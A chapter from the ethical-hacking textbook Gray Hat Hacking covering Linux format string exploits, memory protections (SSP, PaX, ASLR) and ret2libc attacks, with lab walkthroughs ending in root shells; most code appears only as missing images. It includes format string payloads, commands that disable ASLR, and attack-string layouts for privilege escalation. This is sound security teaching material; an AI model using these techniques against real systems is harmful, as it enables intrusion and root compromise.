Advanced Linux Exploits - From Vulnerability to Exploit - Praise for Gray Hat Hacking: The Ethical Hacker’s Handbook, Fourth Edition (2015)

Praise for Gray Hat Hacking: The Ethical Hacker’s Handbook, Fourth Edition (2015)

PART II. From Vulnerability to Exploit

CHAPTER 11. Advanced Linux Exploits

Now that you have the basics under your belt from reading Chapter 10, you are ready to study more advanced Linux exploits. The field is advancing constantly, and there are always new techniques discovered by the hackers and countermeasures implemented by developers. No matter how you approach the problem, you need to move beyond the basics. That said, we can only go so far in this book; your journey is only beginning. The “For Further Reading” section will give you more destinations to explore.

In this chapter, we cover the following topics:

• Format string exploits

• Memory protection schemes

Format String Exploits

Format string exploits became public in late 2000. Unlike buffer overflows, format string errors are relatively easy to spot in source code and binary analysis. Once spotted, they are usually eradicated quickly. Because they are more likely to be found by automated processes, as discussed in later chapters, format string errors appear to be on the decline. That said, it is still good to have a basic understanding of them because you never know what will be found tomorrow. Perhaps you might find a new format string error!

The Problem

Format strings are found in format functions. In other words, the function may behave in many ways depending on the format string provided. Following are some of the many format functions that exist (see the “References” section for a more complete list):

printf() Prints output to the standard input/output (STDIO) handle (usually the screen)

fprintf() Prints output to a file stream

sprintf() Prints output to a string

snprintf() Prints output to a string with length checking built in

Format Strings

As you may recall from Chapter 2, the printf() function may have any number of arguments. We will discuss two forms here:

printf(<format string>, <list of variables/values>);
printf(<user supplied string>);

The first form is the most secure way to use the printf() function because the programmer explicitly specifies how the function is to behave by using a format string (a series of characters and special format tokens).

Table 11-1 introduces two more format tokens, %hn and <number>$, that may be used in a format string (the four originally listed in Table 2-4 are included for your convenience).

image

Table 11-1 Commonly Used Format Symbols

The Correct Way

Recall the correct way to use the printf() function. For example, the code

image

produces the following output:

image

The Incorrect Way

Now take a look at what happens if we forget to add a value for the %s to replace:

image

image

What was that? Looks like Greek, but actually it’s machine language (binary), shown in ASCII. In any event, it is probably not what you were expecting. To make matters worse, consider what happens if the second form of printf() is used like this:

image

If the user runs the program like this, all is well:

#gcc -o fmt3 fmt3.c
#./fmt3 Testing
Testing#

The cursor is at the end of the line because we did not use a \n carriage return, as before. But what if the user supplies a format string as input to the program?

#gcc -o fmt3 fmt3.c
#./fmt3 Testing%s
TestingYyy´¿y#

Wow, it appears that we have the same problem. However, it turns out this latter case is much more deadly because it may lead to total system compromise. To find out what happened here, we need to look at how the stack operates with format functions.

Stack Operations with Format Functions

To illustrate the function of the stack with format functions, we will use the following program:

image

During execution of the printf() function, the stack looks like Figure 11-1.

image

Figure 11-1 Depiction of the stack when printf() is executed

As always, the parameters of the printf() function are pushed on the stack in reverse order, as shown in Figure 11-1. The addresses of the parameter variables are used. The printf() function maintains an internal pointer that starts out pointing to the format string (or top of the stack frame) and then begins to print characters of the format string to the STDIO handle (the screen in this case) until it comes upon a special character.

If the % is encountered, the printf() function expects a format token to follow and thus increments an internal pointer (toward the bottom of the stack frame) to grab input for the format token (either a variable or absolute value). Therein lies the problem: the printf() function has no way of knowing if the correct number of variables or values were placed on the stack for it to operate. If the programmer is sloppy and does not supply the correct number of arguments, or if the user is allowed to present their own format string, the function will happily move down the stack (higher in memory), grabbing the next value to satisfy the format string requirements. So what we saw in our previous examples was the printf() function grabbing the next value on the stack and returning it where the format token required.

imageNOTE The \ is handled by the compiler and used to escape the next character after it. This is a way to present special characters to a program and not have them interpreted literally. However, if a \x is encountered, then the compiler expects a number to follow and converts that number to its hex equivalent before processing.

Implications

The implications of this problem are profound indeed. In the best case, the stack value may contain a random hex number that may be interpreted as an out-of-bounds address by the format string, causing the process to have a segmentation fault. This could possibly lead to a denial-of-service condition to an attacker.

In the worst case, however, a careful and skillful attacker may be able to use this fault to both read arbitrary data and write data to arbitrary addresses. In fact, if the attacker can overwrite the correct location in memory, they may be able to gain root privileges.

Example of a Vulnerable Program

For the remainder of this section, we will use the following piece of vulnerable code to demonstrate the possibilities:

image

image

imageNOTE The Canary value is just a placeholder for now. It is important to realize that your value will certainly be different. For that matter, your system may produce different values for all the examples in this chapter; however, the results should be the same.

image Lab 11-1: Reading from Arbitrary Memory

imageNOTE This lab, like all of the labs, has a unique README file with instructions for setup. See the Appendix for more information.

We will now begin to take advantage of the vulnerable program. We will start slowly and then pick up speed. Buckle up, here we go!

Using the %x Token to Map Out the Stack

As shown in Table 11-1, the %x format token is used to provide a hex value. So, by supplying a few %08x tokens to our vulnerable program, we should be able to dump the stack values to the screen:

$ ./fmtstr “AAAA %08x %08x %08x %08x”
AAAA bffffd2d 00000648 00000774 41414141
Canary at 0x08049734 = 0x00000000
$

The 08 is used to define the precision of the hex value (in this case, 8 bytes wide). Notice that the format string itself was stored on the stack, proven by the presence of our AAAA (0x41414141) test string. The fact that the fourth item shown (from the stack) was our format string depends on the nature of the format function used and the location of the vulnerable call in the vulnerable program. To find this value, simply use brute force and keep increasing the number of %08x tokens until the beginning of the format string is found. For our simple example (fmtstr), the distance, called the (offset, is defined as 4.

Using the %s Token to Read Arbitrary Strings

Because we control the format string, we can place anything in it we like (well, almost anything). For example, if we wanted to read the value of the address located in the fourth parameter, we could simply replace the fourth format token with %s, as shown:

$ ./fmtstr “AAAA %08x %08x %08x %s”
Segmentation fault
$

Why did we get a segmentation fault? Because, as you recall, the %s format token will take the next parameter on the stack (in this case, the fourth one) and treat it like a memory address to read from (by reference). In our case, the fourth value is AAAA, which is translated in hex to 0x41414141, which (as we saw in the previous chapter) causes a segmentation fault.

Reading Arbitrary Memory

So how do we read from arbitrary memory locations? Simple: we supply valid addresses within the segment of the current process. We will use the following helper program to assist us in finding a valid address:

image

The purpose of this program is to fetch the location of environment variables from the system. To test this program, let’s check for the location of the SHELL variable, which stores the location of the current user’s shell:

$ ./getenv SHELL
SHELL is located at 0xbffff76e

imageNOTE Remember to disable the ASLR on current Kali versions (see the section “Address Space Layout Randomization (ASLR),” later in this chapter). Otherwise, the found address for the SHELL variable will vary and the following exercises won’t work.

Now that we have a valid memory address, let’s try it. First, remember to reverse the memory location because this system is little-endian:

image

Success! We were able to read up to the first NULL character of the address given (the SHELL environment variable). Take a moment to play with this now and check out other environment variables. To dump all environment variables for your current session, type env | more at the shell prompt.

Simplifying the Process with Direct Parameter Access

Simplifying the Process with Direct Parameter Access To make things even easier, you may even access the fourth parameter from the stack by what is called direct parameter access. The #$ format token is used to direct the format function to jump over a number of parameters and select one directly. Here is an example:

image

Now when you use the direct parameter format token from the command line, you need to escape the $ with a \ in order to keep the shell from interpreting it. Let’s put this all to use and reprint the location of the SHELL environment variable:

image

Notice how short the format string can be now.

imageCAUTION The preceding format works for bash. Other shells such as tcsh require other formats, such as the following: $ ./fmtstr ‘printf “\x84\xfd\xff\xbf”’‘%4\$s’ Notice the use of a single quote on the end. To make the rest of the chapter’s examples easy, use the bash shell.

Using format string errors, we can specify formats for printf and other printing functions that can read arbitrary memory from a program. Using %x, we can print hex values in order to find parameter location in the stack. Once we know where our value is being stored, we can determine how the printf processes it. By specifying a memory location and then specifying the %s directive for that location, we cause the application to print out the string value at that location.

Using direct parameter access, we don’t have to work through the extra values on the stack. If we already know where positions are in the stack, we can access parameters using %3$s to print the third parameter or %4$s to print the fourth parameter on the stack. This will allow us to read any memory address within our application space as long as it doesn’t have null characters in the address.

Lab 11-2: Writing to Arbitrary Memory

For this example, we will try to overwrite the canary address 0x08049734 with the address of shellcode (which we will store in memory for later use). We will use this address because it is visible to us each time we run fmtstr, but later we will see how we can overwrite nearly any address.

Magic Formula

As shown by Blaess, Grenier, and Raynal, the easiest way to write 4 bytes in memory is to split it up into two chunks (two high-order bytes and two low-order bytes) and then use the #$ and %hn tokens to put the two values in the right place.1

For example, let’s put our shellcode from the previous chapter into an environment variable and retrieve the location:

image

If we wish to write this value into memory, we would split it into two values:

• Two high-order bytes (HOB): 0xbfff

• Two low-order bytes (LOB): 0xff50

As you can see, in our case, HOB is less than (<) LOB, so we would follow the first column in Table 11-2.

image

Table 11-2 The Magic Formula to Calculate Your Exploit Format String

Now comes the magic. Table 11-2 presents the formula to help us construct the format string used to overwrite an arbitrary address (in our case, the canary address, 0x08049734).

Using the Canary Value to Practice

Using Table 11-2 to construct the format string, let’s try to overwrite the canary value with the location of our shellcode.

imageCAUTION At this point, you must understand that the names of our programs (getenv and fmtstr) need to be the same length. This is because the program name is stored on the stack at startup, and therefore the two programs will have different environments (and locations of the shellcode in this case) if their names are of different lengths. If you named your programs something different, you will need to play around and account for the difference or simply rename them to the same size for these examples to work.

To construct the injection buffer to overwrite the canary address 0x08049734 with 0xbfffff50, follow the formula in Table 11-2. Values are calculated for you in the right column and used here:

image

imageCAUTION Once again, your values will be different. Start with the getenv program, and then use Table 11-2 to get your own values. Also, there is actually no new line between the printf and the double quote.

Using string format vulnerabilities, we can also write memory. By leveraging the formula in Table 11-2, we can pick memory locations within the application and overwrite values. This table makes the math easy to compute what values need to be set to manipulate values and then write them into a specific memory location. This will allow us to change variable values as well as set up for more complex attacks.

Lab 11-3: Changing Program Execution

Okay, so what? We can overwrite a staged canary value…big deal. It is a big deal because some locations are executable and, if overwritten, may lead to system redirection and execution of your shellcode. We will look at one of many such locations, called .fini_array.

ELF32 File Format

When the GNU compiler creates binaries, they are stored in ELF32 file format. This format allows for many tables to be attached to the binary. Among other things, these tables are used to store pointers to functions the file may need often. There are two tools you may find useful when dealing with binary files:

nm Used to dump the addresses of the sections of the ELF32 format file

objdump Used to dump and examine the individual sections of the file

Let’s start with the nm tool:

image

And to view a section (say, .comment), you would simply use the objdump tool:

image

FINI_ARRAY Section

In C/C++, the fini_array section provides a list of functions to run when an application ends. This is used to help an application clean up data or do other processing that may be desired when an application ends. For example, if you wanted to print a message every time the program exited, you would use a destructor. The fini_array section is stored in the binary itself, and can be seen by using nm and objdump.

Let’s take a look at a modified version of strfmt.c that uses a destructor to show where the canary is:

image

We have modified the program to use a destructor to print the canary value. This is done by defining checkCanary with a destructor attribute, and then creating the new function in the program. Now instead of printing the canary value out in the main function, it will print when the program ends.

Let’s explore the nm and objdump output. To start, nm will allow us to dump the symbols. We are looking for the destructors (dtors) fini_array element.

image

We see here that our fini_array entry is at 0x08049634. Next, we would want to see what functions are being called. To do this, we can use objdump. This will dump information about the fini_array section for us.

image

Here, we can see that the section shows the address of the fini_arrayimage. This value matches up with what we saw from our nm output. Next, there are two functions in the array. The addressimage image of the two functions can be seen after the location of the array. These are in little-endian byte order (reverse order). Now we can use nm to determine where these functions point to:

$ nm ./fmtstr | grep -e 08048430 -e 080484ba
image08048430 t __do_global_dtors_aux
image080484ba t checkCanary

We can see from here that two destructors are called upon execution. One is the do_global_dtors_auximage function and the other is the checkCanaryimagefunction.

Putting It All Together

Now back to our vulnerable format string program, fmtstr.

It turns out that if we overwrite an existing function pointer in the fini_array section with our target return address (in this case, our shellcode address), the program will happily jump to that location and execute. To get the first pointer location or the end marker, simply add 4 bytes to thefini_array location. In our case, this is

0x8049634 + 4 = 0x8049638

which goes in our second memory slot, bolded in the following code.

Follow the same first column of Table 11-2 to calculate the required format string to overwrite the new memory address 0x0804951c with the address of the shellcode: 0xbffffe3f in our case. Here goes:

image

image

Success! Relax, you earned it.

There are many other useful locations to overwrite. Here are some examples:

• The global offset table

• Global function pointers

• The atexit handlers

• Stack values

• Program-specific authentication variables

And there are many more; see “For Further Reading” for more ideas.

Leveraging string format weaknesses, we have the ability to overwrite memory, including function pointers. By using the techniques from Lab 11-2 along with the destructors inherent to a binary, we can alter application flow. By putting shellcode into an environment variable and identifying the location of that shellcode, we know where the application should be diverted to. Using the printf statement, we can overwrite that location into the .fini_array array to be executed on application completion.

Memory Protection Schemes

Since buffer overflows and heap overflows have come to be, many programmers have developed memory protection schemes to prevent these attacks. As you will see, some work, some don’t.

Compiler Improvements

Several improvements have been made to the gcc compiler, starting in GCC 4.1.

Libsafe

Libsafe is a dynamic library that allows for the safer implementation of the following dangerous functions:

strcpy()

strcat()

sprintf(), vsprintf()

getwd()

gets()

realpath()

fscanf(), scanf(), sscanf()

Libsafe overwrites these dangerous libc functions, replacing the bounds and input-scrubbing implementations, thereby eliminating most stack-based attacks. However, there is no protection offered against the heap-based exploits described in this chapter.

StackShield, StackGuard, and Stack Smashing Protection (SSP)

StackShield is a replacement to the gcc compiler that catches unsafe operations at compile time. Once it’s installed, the user simply issues shieldgcc instead of gcc to compile programs. In addition, when a function is called, StackShield copies the saved return address to a safe location and restores the return address upon returning from the function.

StackGuard was developed by Crispin Cowan of Immunix.com and is based on a system of placing “canaries” between the stack buffers and the frame state data. If a buffer overflow attempts to overwrite saved eip, the canary will be damaged and a violation will be detected.

Stack Smashing Protection (SSP), formerly called ProPolice, is now developed by Hiroaki Etoh of IBM and improves on the canary-based protection of StackGuard by rearranging the stack variables to make them more difficult to exploit. In addition, a new prolog and epilog are implemented with SSP.

The following is the previous prolog:

image

As shown in Figure 11-2, a pointer is provided to ArgC and checked after the return of the application, so the key is to control that pointer to ArgC, instead of saved Ret.

image

Figure 11-2 Old and new prolog

Because of this new prolog, a new epilog is created:

image

Lab 11-4: Bypassing Stack Protection

Back in Chapter 10, we discussed how to handle overflows of small buffers by using the end of the environment segment of memory. Now that we have a new prolog and epilog, we need to insert a fake frame, including a fake Ret and fake ArgC, as shown in Figure 11-3.

image

Figure 11-3 Using a fake frame to attack small buffers

Using this fake frame technique, we can control the execution of the program by jumping to the fake ArgC, which will use the fake Ret address (the actual address of the shellcode). The source code of such an attack follows:

image

imageNOTE The preceding code actually works for both cases, with and without stack protection on. This is a coincidence, due to the fact that it takes 4 bytes less to overwrite the pointer to ArgC than it did to overwrite saved Ret under the previous way of performing buffer overflows.

The preceding code can be executed as follows:

image

SSP has been incorporated in GCC (starting in version 4.1) and is on by default. It may be disabled with the –fno-stack-protector flag, and it can be forced by using –fstack-protector-all.

You may check for the use of SSP by using the objdump tool:

image

Notice the call to the stack_chk_fail@plt function, compiled into the binary.

imageNOTE As implied by their names, none of the tools described in this section offers any protection against heap-based attacks.

Non-Executable Stack (GCC Based)

GCC has implemented a non-executable stack, using the GNU_STACK ELF markings. This feature is on by default (starting in version 4.1) and may be disabled with the –z execstack flag, as shown here:

image

Notice that in the first command the RW flag is set in the ELF markings, and in the second command (with the –z execstack flag) the RWE flag is set in the ELF markings. The flags stand for read (R), write (W), and execute (E).

In this lab, we looked at how to determine if stack protections are in place as well as how to bypass them. Using a fake frame, we can get our shellcode to execute by controlling where the application returns.

Kernel Patches and Scripts

Although many protection schemes are introduced by kernel-level patches and scripts, we will mention only a few of them here.

Non-Executable Memory Pages (Stacks and Heaps)

Early on, developers realized that program stacks and heaps should not be executable and that user code should not be writable once it is placed in memory. Several implementations have attempted to achieve these goals.

The Page-eXec (PaX) patches attempt to provide execution control over the stack and heap areas of memory by changing the way memory paging is done. Normally, a page table entry (PTE) exists for keeping track of the pages of memory and caching mechanisms called data and instruction translation look-aside buffers (TLBs). The TLBs store recently accessed memory pages and are checked by the processor first when accessing memory. If the TLB caches do not contain the requested memory page (a cache miss), then the PTE is used to look up and access the memory page. The PaX patch implements a set of state tables for the TLB caches and maintains whether a memory page is in read/write mode or execute mode. As the memory pages transition from read/write mode into execute mode, the patch intervenes, logging and then killing the process making this request. PaX has two methods to accomplish non-executable pages. The SEGMEXEC method is faster and more reliable, but splits the user space in half to accomplish its task. When needed, PaX uses a fallback method, PAGEEXEC, which is slower but also very reliable.

Red Hat Enterprise Server and Fedora offer the ExecShield implementation of non-executable memory pages. Although quite effective, it has been found to be vulnerable under certain circumstances and to allow data to be executed.

Address Space Layout Randomization (ASLR)

The intent of ASLR is to randomize the following memory objects:

• Executable image

Brk()-managed heap

• Library images

Mmap()-managed heap

• User space stack

• Kernel space stack

PaX, in addition to providing non-executable pages of memory, fully implements the preceding ASLR objectives. grsecurity (a collection of kernel-level patches and scripts) incorporates PaX and has been merged into many versions of Linux. Red Hat and Fedora use a Position Independent Executable (PIE) technique to implement ASLR. This technique offers less randomization than PaX, although they protect the same memory areas. Systems that implement ASLR provide a high level of protection from “return into libc” exploits by randomizing the way the function pointers of libc are called. This is done through the randomization of the mmap() command and makes finding the pointer to system() and other functions nearly impossible. However, using brute-force techniques to find function calls such as system() is possible.

On Debian- and Ubuntu-based systems, the following command can be used to disable ASLR:

root@quazi(/tmp):# echo 0 > /proc/sys/kernel/randomize_va_space

On Red Hat–based systems, the following commands can be used to disable ASLR:

root@quazi(/tmp):# echo 1 > /proc/sys/kernel/exec-shield
root@quazi(/tmp):# echo 1 > /proc/sys/kernel/exec-shield-randomize

Lab 11-5: Return to libc Exploits

“Return to libc” is a technique that was developed to get around non-executable stack memory protection schemes such as PaX and ExecShield. Basically, the technique uses the controlled eip to return execution into existing glibc functions instead of shellcode. Remember, glibc is the ubiquitous library of C functions used by all programs. The library has functions such as system() and exit(), both of which are valuable targets. Of particular interest is the system() function, which is used to run programs on the system. All you need to do is munge (shape or change) the stack to trick the system() function into calling a program of your choice, say /bin/sh.

To make the proper system() function call, we need our stack to look like this:

image

We will overflow the vulnerable buffer and exactly overwrite the old saved eip with the address of the glibc system() function. When our vulnerable main() function returns, the program will return into the system() function as this value is popped off the stack into the eip register and executed. At this point, the system() function will be entered and the system() prolog will be called, which will build another stack frame on top of the position marked “Filler,” which for all intents and purposes will become our new saved eip (to be executed after the system() function returns). Now, as you would expect, the arguments for the system() function are located just below the newly saved eip (marked “Filler” in the diagram). Because the system() function is expecting one argument (a pointer to the string of the filename to be executed), we will supply the pointer of the string “/bin/sh” at that location. In this case, we don’t actually care what we return to after the system function executes. If we did care, we would need to be sure to replace Filler with a meaningful function pointer such as exit().

imageNOTE Stack randomization makes these types of attacks very hard (not impossible) to do. Basically, brute force needs to be used to guess the addresses involved, which greatly reduces your odds of success. As it turns out, the randomization varies from system to system and is not truly random.

Let’s look at an example. Start by turning off stack randomization:

# echo 0 > /proc/sys/kernel/randomize_va_space

Take a look at the following vulnerable program:

image

As you can see, this program is vulnerable due to the strcpy command that copies argv[1] into the small buffer. Compile the vulnerable program, set it as SUID, and return to a normal user account:

image

Now we are ready to build the “return to libc” exploit and feed it to the vuln2 program. We need the following items to proceed:

• Address of glibc system() function

• Address of the string “/bin/sh”

It turns out that functions like system() and exit() are automatically linked into binaries by the gcc compiler. To observe this fact, start the program with gdb in quiet mode. Set a breakpoint on main() and then run the program. When the program halts on the breakpoint, print the locations of the glibc function called system().

image

Another cool way to get the locations of functions and strings in a binary is by searching the binary with a custom program, as follows:

image

image

The preceding program uses the dlopen() and dlsym() functions to handle objects and symbols located in the binary. Once the system() function is located, the memory is searched in both directions, looking for the existence of the “/bin/sh” string. The “/bin/sh” string can be found embedded in glibc and keeps the attacker in this case from depending on access to environment variables to complete the attack. Finally, the value is checked to see if it contains a NULL byte and the location is printed. You may customize the preceding program to look for other objects and strings. Let’s compile the preceding program and test-drive it:

image

A quick check of the preceding gdb value shows the same location for the system() function: success!

We now have everything required to successfully attack the vulnerable program using the “return to libc” exploit. Putting it all together, we see this:

image

Notice that we got a shell that is euid root, and when we exited from the shell, we got a segmentation fault. Why did this happen? The program crashed when we left the user-level shell because the filler we supplied (0x42424242) became the saved eip to be executed after the system()function. So, a crash was the expected behavior when the program ended. To avoid that crash, we will simply supply the pointer to the exit() function in that filler location:

image

Congratulations, we now have a shell with the effective uid (euid) of root.

Using “return to libc” (ret2libc), we have the ability to direct application flow to other parts of the binary. By loading the stack with return paths and options to functions, when we overwrite EIP, we can direct the application flow to other parts of the application. Because we’ve loaded the stack with valid return locations and data locations, the application won’t know it has been diverted, allowing us to leverage these techniques to launch our shell.

Lab 11-6: Maintaining Privileges With ret2libc

In some cases, we may end up without root privileges. This is because the default behavior of system and bash on some systems is to drop privileges on startup. The bash installed in Kali does not do this; however, Red Hat and others do.

For this lab, we will be using Backtrack 2 in order to have a standard distribution that drops privileges through system as well as has our debugging tools on it. To get around the privilege dropping, we need to use a wrapper program, which will contain the system function call. Then, we will call the wrapper program with the execl() function, which does not drop privileges. The wrapper will look like this:

image

Notice that we do not need the wrapper program to be SUID. Now we need to call the wrapper with the execl() function, like this:

execl(“./wrapper”, “./wrapper”, NULL)

We now have another issue to work through: the execl() function contains a NULL value as the last argument. We will deal with that in a moment. First, let’s test the execl() function call with a simple test program and ensure that it does not drop privileges when run as root:

image

Compile and make SUID like the vulnerable program vuln2.c:

image

Run it to test the functionality:

image

Great, we now have a way to keep the root privileges. Now all we need is a way to produce a NULL byte on the stack. There are several ways to do this; however, for illustrative purposes, we will use the printf() function as a wrapper around the execl() function. Recall that the %hnformat token can be used to write into memory locations. To make this happen, we need to chain together more than one libc function call, as shown here:

image

Just like we did before, we will overwrite the old saved eip with the address of the glibc printf() function. At that point, when the original vulnerable function returns, this new saved eip will be popped off the stack and printf() will be executed with the arguments starting with “%3\$n”, which will write the number of bytes in the format string up to the format token (0x0000) into the third direct parameter. Because the third parameter contains the location of itself, the value of 0x0000 will be written into that spot. Next, the execl() function will be called with the arguments from the first “./wrapper” string onward. Voilà, we have created the desired execl() function on the fly with this self-modifying buffer attack string.

In order to build the preceding exploit, we need the following information:

• The address of the printf() function

• The address of the execl() function

• The address of the “%3\$n” string in memory (we will use the environment section)

• The address of the “./wrapper” string in memory (we will use the environment section)

• The address of the location we wish to overwrite with a NULL value

Starting at the top, let’s get the addresses:

image

We will use the environment section of memory to store our strings and retrieve their location with our handy get_env.c utility:

image

Remember that the get_env program needs to be the same size as the vulnerable program—in this case, vuln2 (five characters):

$ gcc -o gtenv get_env.c

Okay, we are ready to place the strings into memory and retrieve their locations:

image

We have everything except the location of the last memory slot of our buffer. To determine this value, first we find the size of the vulnerable buffer. With this simple program, we have only one internal buffer, which will be located at the top of the stack when inside the vulnerable functionmain(). In the real world, a little more research will be required to find the location of the vulnerable buffer by looking at the disassembly and some trial and error.

image

Now that we know the size of the vulnerable buffer and compiler-added padding (0x18 = 24), we can calculate the location of the sixth memory address by adding 24 + 6*4 = 48 = 0x30. Because we will place 4 bytes in that last location, the total size of the attack buffer will be 52 bytes.

Next, we will send a representative-size (52 bytes) buffer into our vulnerable program and find the location of the beginning of the vulnerable buffer with gdb by printing the value of $esp:

image

Now that we have the location of the beginning of the buffer, add the calculated offset from earlier to get the correct target location (sixth memory slot after our overflowed buffer):

0xbffff480 + 0x30 = 0xBFFFF4B0

Finally, we have all the data we need, so let’s attack!

image

image

Woot! It worked. Some of you may have realized that a shortcut exists here. If you look at the last illustration, you will notice the last value of the attack string is a NULL. Occasionally, you will run into this situation. In that rare case, you don’t care if you pass a NULL byte into the vulnerable program, because the string will terminate by a NULL anyway. Therefore, in this canned scenario, you could have removed the printf() function and simply fed the execl() attack string, as follows:

./vuln2 [filler of 28 bytes][&execl][&exit][./wrapper][./wrapper][\x00]

Try it:

image

Both ways work in this case. You will not always be as lucky, so you need to know both ways. See the “For Further Reading” section for even more creative ways to return to libc.

When privileges are being dropped, we can leverage other function calls to work around the calls that are dropping privileges. In this case, we leveraged the printf memory overwrite capability to null-terminate the options to execl. By chaining these function calls using ret2libc, we don’t have to worry about putting executable code on the stack, and we can use complex options to functions we’ve pushed onto the stack.

Bottom Line

Now that we have discussed some of the more common techniques used for memory protection, how do they stack up? Of the ones we reviewed, ASLR (PaX and PIE) and non-executable memory (PaX and ExecShield) provide protection to both the stack and the heap. StackGuard, StackShield, SSP, and Libsafe provide protection to stack-based attacks only. The following table shows the differences in the approaches.

image

Summary

In this chapter, we investigated string format weaknesses and how to leverage those weaknesses to expose data and impact application flow. By requesting additional data through the format string, we can expose memory locations leaking information about the contents of variables and the stack.

Additionally, we can use the format string to change memory locations. Using some basic math, we can change values in memory to change application flow, or we can impact program execution by adding arguments to the stack and changing EIP values. These techniques can lead to arbitrary code execution, allowing for local privilege escalation or remote execution for network services.

We also looked at memory protection techniques like stack protection and layout randomization and then investigated some basic ways to bypass them. We leveraged a ret2libc attack to control program execution. By leveraging the libc functions, we were able to redirect application flow into known function locations with arguments we had pushed onto the stack. This allowed the functions to run without executing code on the stack and avoid having to guess at memory locations.

Combining these techniques, we now have a better toolkit for dealing with real-world systems and the ability to leverage these complex attacks for more sophisticated exploits. Protection techniques change, and strategies to defeat them evolve, so to better understand these techniques, the “For Further Reading” section has additional material for review.

References

1. Blaess, Christophe, Christophe Grenier, and Frédéreric Raynal (2001, February 16). “Secure Programming, Part 4: Format Strings.” Retrieved from: www.cgsecurity.org/Articles/SecProg/Art4/.

For Further Reading

Advanced return-into-lib(c) Exploits (PaX Case Study) (nergal) www.phrack.com/issues.html?issue=58&id=4#article.

Exploiting Software: How to Break Code(Greg Hoglund and Gary McGraw) Addison-Wesley, 2004.

“Getting Around Non-Executable Stack (and Fix)” (Solar Designer) www.imchris.org/projects/overflows/returntolibc1.html.

Hacking: The Art of Exploitation (Jon Erickson) No Starch Press, 2003.

“Overwriting the .dtors Section” (Juan M. Bello Rivas) www.cash.sopot.kill.pl/bufer/dtors.txt.

Shaun2k2’s libc exploits www.exploit-db.com/exploits/13197/.

The Shellcoder’s Handbook: Discovering and Exploiting Security Holes (Jack Koziol et al.) Wiley, 2004.

“When Code Goes Wrong – Format String Exploitation” (DangerDuo) www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=7949&mode=thread&order=0&thold=0.